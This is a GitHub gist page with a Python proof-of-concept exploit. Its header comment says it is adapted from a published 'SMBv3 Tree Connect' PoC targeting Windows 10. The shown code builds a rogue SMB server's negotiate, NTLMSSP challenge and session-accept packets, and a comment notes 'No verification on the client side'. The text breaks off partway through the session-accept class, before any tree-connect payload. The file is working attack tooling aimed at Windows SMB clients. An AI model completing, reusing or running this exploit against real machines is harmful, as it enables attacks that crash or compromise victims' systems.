Created
February 16, 2017 14:00
-
-
Save tovask/e513eafc045200b4ae8248ada5cb83a7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://github.com/lgandx/PoC/blob/master/SMBv3%20Tree%20Connect/Win10.py | |
| # corrected for Python 3.4.3 | |
| import sys, struct, socketserver | |
| from collections import OrderedDict | |
| from datetime import datetime | |
| from calendar import timegm | |
| class Packet(): | |
| fields = OrderedDict([ | |
| ("data", ""), | |
| ]) | |
| def __init__(self, **kw): | |
| self.fields = OrderedDict(self.__class__.fields) | |
| for k,v in kw.items(): | |
| if callable(v): | |
| self.fields[k] = v(self.fields[k]) | |
| else: | |
| self.fields[k] = v | |
| def __str__(self): | |
| return "".join(map(str, self.fields.values())) | |
| def NTStamp(Time): | |
| NtStamp = 116444736000000000 + (timegm(Time.timetuple()) * 10000000) | |
| return struct.pack("Q", NtStamp + (Time.microsecond * 10)) | |
| def longueur(payload): | |
| length = struct.pack(">i", len(''.join(payload))) | |
| return length | |
| def GrabMessageID(data): | |
| Messageid = data[28:36] | |
| return Messageid | |
| def GrabCreditRequested(data): | |
| CreditsRequested = data[18:20] | |
| if CreditsRequested == "\x00\x00": | |
| CreditsRequested = "\x01\x00" | |
| else: | |
| CreditsRequested = data[18:20] | |
| return CreditsRequested | |
| def GrabCreditCharged(data): | |
| CreditCharged = data[10:12] | |
| return CreditCharged | |
| def GrabSessionID(data): | |
| SessionID = data[44:52] | |
| return SessionID | |
| ################################################################################## | |
| class SMBv2Header(Packet): | |
| fields = OrderedDict([ | |
| ("Proto", "\xfe\x53\x4d\x42"), | |
| ("Len", "\x40\x00"), | |
| ("CreditCharge", "\x00\x00"), | |
| ("NTStatus", "\x00\x00\x00\x00"), | |
| ("Cmd", "\x00\x00"), | |
| ("Credits", "\x01\x00"), | |
| ("Flags", "\x01\x00\x00\x00"), | |
| ("NextCmd", "\x00\x00\x00\x00"), | |
| ("MessageId", "\x00\x00\x00\x00\x00\x00\x00\x00"), | |
| ("PID", "\xff\xfe\x00\x00"), | |
| ("TID", "\x00\x00\x00\x00"), | |
| ("SessionID", "\x00\x00\x00\x00\x00\x00\x00\x00"), | |
| ("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"), | |
| ]) | |
| ################################################################################## | |
| class SMB2NegoAns(Packet): | |
| fields = OrderedDict([ | |
| ("Len", "\x41\x00"), | |
| ("Signing", "\x01\x00"), | |
| ("Dialect", "\xff\x02"), | |
| ("Reserved", "\x00\x00"), | |
| ("Guid", "\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x72\xa9"), | |
| ("Capabilities", "\x07\x00\x00\x00"), | |
| ("MaxTransSize", "\x00\x00\x10\x00"), | |
| ("MaxReadSize", "\x00\x00\x10\x00"), | |
| ("MaxWriteSize", "\x00\x00\x10\x00"), | |
| ("SystemTime", NTStamp(datetime.now())), | |
| ("BootTime", "\x22\xfb\x80\x01\x40\x09\xd2\x01"), | |
| ("SecBlobOffSet", "\x80\x00"), | |
| ("SecBlobLen", "\x78\x00"), | |
| ("Reserved2", "\x4d\x53\x53\x50"), | |
| ("InitContextTokenASNId", "\x60"), | |
| ("InitContextTokenASNLen", "\x76"), | |
| ("ThisMechASNId", "\x06"), | |
| ("ThisMechASNLen", "\x06"), | |
| ("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"), | |
| ("SpNegoTokenASNId", "\xA0"), | |
| ("SpNegoTokenASNLen", "\x6c"), | |
| ("NegTokenASNId", "\x30"), | |
| ("NegTokenASNLen", "\x6a"), | |
| ("NegTokenTag0ASNId", "\xA0"), | |
| ("NegTokenTag0ASNLen", "\x3c"), | |
| ("NegThisMechASNId", "\x30"), | |
| ("NegThisMechASNLen", "\x3a"), | |
| ("NegThisMech1ASNId", "\x06"), | |
| ("NegThisMech1ASNLen", "\x0a"), | |
| ("NegThisMech1ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"), | |
| ("NegThisMech2ASNId", "\x06"), | |
| ("NegThisMech2ASNLen", "\x09"), | |
| ("NegThisMech2ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"), | |
| ("NegThisMech3ASNId", "\x06"), | |
| ("NegThisMech3ASNLen", "\x09"), | |
| ("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"), | |
| ("NegThisMech4ASNId", "\x06"), | |
| ("NegThisMech4ASNLen", "\x0a"), | |
| ("NegThisMech4ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"), | |
| ("NegThisMech5ASNId", "\x06"), | |
| ("NegThisMech5ASNLen", "\x0a"), | |
| ("NegThisMech5ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"), | |
| ("NegTokenTag3ASNId", "\xA3"), | |
| ("NegTokenTag3ASNLen", "\x2a"), | |
| ("NegHintASNId", "\x30"), | |
| ("NegHintASNLen", "\x28"), | |
| ("NegHintTag0ASNId", "\xa0"), | |
| ("NegHintTag0ASNLen", "\x26"), | |
| ("NegHintFinalASNId", "\x1b"), | |
| ("NegHintFinalASNLen", "\x24"), | |
| ("NegHintFinalASNStr", "[email protected]"), | |
| ("Data", ""), | |
| ]) | |
| def calculate(self): | |
| StructLen = str(self.fields["Len"])+str(self.fields["Signing"])+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fields["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransSize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"]) | |
| SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"]) | |
| AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"]) | |
| AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"]) | |
| MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"]) | |
| Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"]) | |
| #Sec Blob lens | |
| self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64) | |
| self.fields["SecBlobLen"] = struct.pack("<h",len(SecBlobLen)) | |
| #ASN Stuff | |
| self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(SecBlobLen)-2) | |
| self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"]))) | |
| self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2)) | |
| self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2) | |
| self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen)) | |
| self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"]))) | |
| self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"]))) | |
| self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"]))) | |
| self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"]))) | |
| self.fields["NegThisMech5ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech5ASNStr"]))) | |
| self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len)) | |
| self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2) | |
| self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4) | |
| self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"]))) | |
| ################################################################################## | |
| class SMB2Session1Data(Packet): | |
| fields = OrderedDict([ | |
| ("Len", "\x09\x00"), | |
| ("SessionFlag", "\x01\x00"), | |
| ("SecBlobOffSet", "\x48\x00"), | |
| ("SecBlobLen", "\x06\x01"), | |
| ("ChoiceTagASNId", "\xa1"), | |
| ("ChoiceTagASNLenOfLen", "\x82"), | |
| ("ChoiceTagASNIdLen", "\x01\x02"), | |
| ("NegTokenTagASNId", "\x30"), | |
| ("NegTokenTagASNLenOfLen","\x81"), | |
| ("NegTokenTagASNIdLen", "\xff"), | |
| ("Tag0ASNId", "\xA0"), | |
| ("Tag0ASNIdLen", "\x03"), | |
| ("NegoStateASNId", "\x0A"), | |
| ("NegoStateASNLen", "\x01"), | |
| ("NegoStateASNValue", "\x01"), | |
| ("Tag1ASNId", "\xA1"), | |
| ("Tag1ASNIdLen", "\x0c"), | |
| ("Tag1ASNId2", "\x06"), | |
| ("Tag1ASNId2Len", "\x0A"), | |
| ("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"), | |
| ("Tag2ASNId", "\xA2"), | |
| ("Tag2ASNIdLenOfLen", "\x81"), | |
| ("Tag2ASNIdLen", "\xE9"), | |
| ("Tag3ASNId", "\x04"), | |
| ("Tag3ASNIdLenOfLen", "\x81"), | |
| ("Tag3ASNIdLen", "\xE6"), | |
| ("NTLMSSPSignature", "NTLMSSP"), | |
| ("NTLMSSPSignatureNull", "\x00"), | |
| ("NTLMSSPMessageType", "\x02\x00\x00\x00"), | |
| ("NTLMSSPNtWorkstationLen","\x1e\x00"), | |
| ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"), | |
| ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"), | |
| ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"), | |
| ("NTLMSSPNtServerChallenge","\x82\x21\x32\x14\x51\x46\xe2\x83"), | |
| ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"), | |
| ("NTLMSSPNtTargetInfoLen","\x94\x00"), | |
| ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"), | |
| ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"), | |
| ("NegTokenInitSeqMechMessageVersionHigh","\x06"), | |
| ("NegTokenInitSeqMechMessageVersionLow","\x03"), | |
| ("NegTokenInitSeqMechMessageVersionBuilt","\x80\x25"), | |
| ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"), | |
| ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"), | |
| ("NTLMSSPNtWorkstationName","SMB3"), | |
| ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB5"), | |
| ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","WIN-PRH502RQAFV"), | |
| ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB5.local"), | |
| ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","WIN-PRH502RQAFV.SMB5.local"), | |
| ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB5.local"), | |
| ("NTLMSSPNTLMChallengeAVPairs7Id","\x07\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs7Len","\x08\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",NTStamp(datetime.now())), | |
| ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"), | |
| ("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"), | |
| ]) | |
| def calculate(self): | |
| ###### Convert strings to Unicode | |
| self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le') | |
| self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le') | |
| self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le') | |
| self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le') | |
| self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le') | |
| self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le') | |
| #Packet struct calc: | |
| StructLen = str(self.fields["Len"])+str(self.fields["SessionFlag"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"]) | |
| ###### SecBlobLen Calc: | |
| CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) | |
| AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]) | |
| #Packet Struct len | |
| self.fields["SecBlobLen"] = struct.pack("<H", len(AsnLen+CalculateSecBlob)) | |
| self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64) | |
| ###### ASN Stuff | |
| if len(CalculateSecBlob) > 255: | |
| self.fields["Tag3ASNIdLen"] = struct.pack(">H", len(CalculateSecBlob)) | |
| else: | |
| self.fields["Tag3ASNIdLenOfLen"] = "\x81" | |
| self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob)) | |
| if len(AsnLen+CalculateSecBlob)-3 > 255: | |
| self.fields["ChoiceTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-4) | |
| else: | |
| self.fields["ChoiceTagASNLenOfLen"] = "\x81" | |
| self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3) | |
| if len(AsnLen+CalculateSecBlob)-7 > 255: | |
| self.fields["NegTokenTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-8) | |
| else: | |
| self.fields["NegTokenTagASNLenOfLen"] = "\x81" | |
| self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-7) | |
| tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]) | |
| if len(tag2length) > 255: | |
| self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length)) | |
| else: | |
| self.fields["Tag2ASNIdLenOfLen"] = "\x81" | |
| self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length)) | |
| self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) | |
| self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"]))) | |
| ###### Workstation Offset | |
| CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) | |
| ###### AvPairs Offset | |
| CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) | |
| ##### Workstation Offset Calculation: | |
| self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation)) | |
| self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"]))) | |
| self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"]))) | |
| ##### Target Offset Calculation: | |
| self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"]))) | |
| self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs)) | |
| self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs)) | |
| ##### IvPair Calculation: | |
| self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"]))) | |
| self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]))) | |
| self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]))) | |
| self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]))) | |
| self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]))) | |
| self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"]))) | |
| class SMB2SessionAcceptData(Packet): | |
| fields = OrderedDict([ | |
| ("Len", "\x09\x00"), | |
| ("SessionFlag", "\x01\x00"), | |
| ("SecBlobOffSet", "\x48\x00"), | |
| ("SecBlobLen", "\x1d\x00"), | |
| ("SecBlobTag0", "\xa1"), | |
| ("SecBlobTag0Len", "\x1b"), | |
| ("NegTokenResp", "\x30"), | |
| ("NegTokenRespLen", "\x19"), | |
| ("NegTokenRespTag0", "\xa0"), | |
| ("NegTokenRespTag0Len", "\x03"), | |
| ("NegStateResp", "\x0a"), | |
| ("NegTokenRespLen1", "\x01"), | |
| ("NegTokenRespStr", "\x00"), | |
| ("SecBlobTag3", "\xa3"), | |
| ("SecBlobTag3Len", "\x12"), | |
| ("SecBlobOctetHeader", "\x04"), | |
| ("SecBlobOctetLen", "\x10"), | |
| ("MechlistMICVersion", ""),# No verification on the client side... | |
| ("MechlistCheckSum", ""), | |
| ("MechlistSeqNumber", ""), | |
| ("Data", ""), | |
| ]) | |
| def calculate(self): | |
| ###### SecBlobLen Calc: | |
| CalculateSecBlob = str(self.fields["SecBlobTag0"])+str(self.fields["SecBlobTag0Len"])+str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"]) | |
